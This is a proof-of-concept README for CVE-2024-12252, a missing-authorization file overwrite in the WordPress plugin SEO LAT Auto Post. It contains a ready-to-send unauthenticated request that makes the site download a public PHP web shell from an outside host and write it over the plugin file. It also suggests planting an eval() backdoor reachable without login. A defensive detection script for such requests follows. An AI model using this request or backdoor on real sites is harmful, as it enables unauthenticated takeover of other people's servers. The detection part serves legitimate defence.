CVE-2024-12252 PoC — WordPress plugin SEO LAT Auto Post code injection vulnerability

Source
Associated Vulnerability
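Title: WordPress plugin SEO LAT Auto Post code injection vulnerability (CVE-2024-12252)
Description: WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP. The platform supports setting up personal blog sites on servers running PHP and MySQL. WordPress plugin is an application plugin. WordPress plugin SEO LAT Auto Post versions 2.2.1 and earlier contain a code injection vulnerability, which stems from a missing capability check in the remote_update function and leads to file overwrite.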
Description
SEO LAT Auto Post <= 2.2.1 - Missing Authorization to File Overwrite/Upload (Remote Code Execution)
Readme
# CVE-2024-12252
SEO LAT Auto Post <= 2.2.1 - Missing Authorization to File Overwrite/Upload (Remote Code Execution)

# Description

The SEO LAT Auto Post plugin for WordPress is vulnerable to file overwrite due to a missing capability check on the remote_update AJAX action in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to overwrite the seo-beginner-auto-post.php file which can be leveraged to achieve remote code execution.

## Details

- **Type**: plugin
- **Slug**: seo-beginner-auto-post
- **Affected Version**: 2.2.1
- **CVSS Score**: 9.8
- **CVSS Rating**: Critical
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-12252
- **Status**: Closed

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: */*
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

action=remote_update&url=https://raw.githubusercontent.com/flozz/p0wny-shell/refs/heads/master/shell.php
```

This will overwrite `https://wp-dev.ddev.site/wp-content/plugins/seo-beginner-auto-post/seo-beginner-auto-post.php`. I would advise altering the current plugin and adding a nopriv action for an RCE: `https://plugins.svn.wordpress.org/seo-beginner-auto-post/trunk/seo-beginner-auto-post.php`

Add a function like:

```


// Add the AJAX action
add_action('wp_ajax_nopriv_execute_code', 'execute_code_callback');
add_action('wp_ajax_execute_code', 'execute_code_callback');

// The callback function
function execute_code_callback() {
    // Get the code to execute from the request
    $code = $_POST['code'];

    // Execute the code
    eval($code);

    // Return a success message
    echo 'Code executed successfully!';
    wp_die();
}
```
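
For defenders, a detection sketch for the request shown in the POC section, added here as an example and not part of the original README: it classifies captured requests to `admin-ajax.php` that invoke the `remote_update` action, treating those without a WordPress login cookie as alerts. The input format (raw request text from a proxy or WAF capture), the sample hostnames and the verdict labels are assumptions.

```python
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
VULN_ACTION = "remote_update"                # AJAX action named in the advisory
AUTH_COOKIE_PREFIX = "wordpress_logged_in_"  # WordPress login cookie name prefix

def parse_request(raw: str):
    """Split a raw request dump into method, target, headers and body."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), target, headers, body.strip()

def classify(raw: str) -> str:
    """Return 'alert', 'review' or 'ignore' for one captured request."""
    # The method is not filtered: admin-ajax.php dispatches GET and POST alike.
    _, target, headers, body = parse_request(raw)
    url = urlsplit(target)
    if not url.path.endswith(AJAX_PATH):
        return "ignore"
    # WordPress reads the action from $_REQUEST, so check query string and form body.
    params = parse_qs(url.query)
    if "x-www-form-urlencoded" in headers.get("content-type", ""):
        for key, values in parse_qs(body).items():
            params.setdefault(key, []).extend(values)
    if VULN_ACTION not in params.get("action", []):
        return "ignore"
    cookies = headers.get("cookie", "")
    logged_in = any(c.strip().startswith(AUTH_COOKIE_PREFIX) for c in cookies.split(";"))
    # A login cookie only shows a session was claimed; it does not prove the capability.
    return "review" if logged_in else "alert"

# Constructed sample requests (not captured traffic); hostnames are placeholders.
HEAD = "POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: blog.example\n"
FORM = "Content-Type: application/x-www-form-urlencoded\n\n"
SAMPLES = {
    "unauth_post": HEAD + FORM + "action=remote_update&url=https://files.example.invalid/x.php",
    "query_string": "POST /wp-admin/admin-ajax.php?action=remote_update HTTP/1.1\nHost: blog.example\n\n",
    "with_cookie": HEAD + "Cookie: wordpress_logged_in_abc=user\n" + FORM + "action=remote_update",
    "heartbeat": HEAD + FORM + "action=heartbeat",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, classify(raw))
```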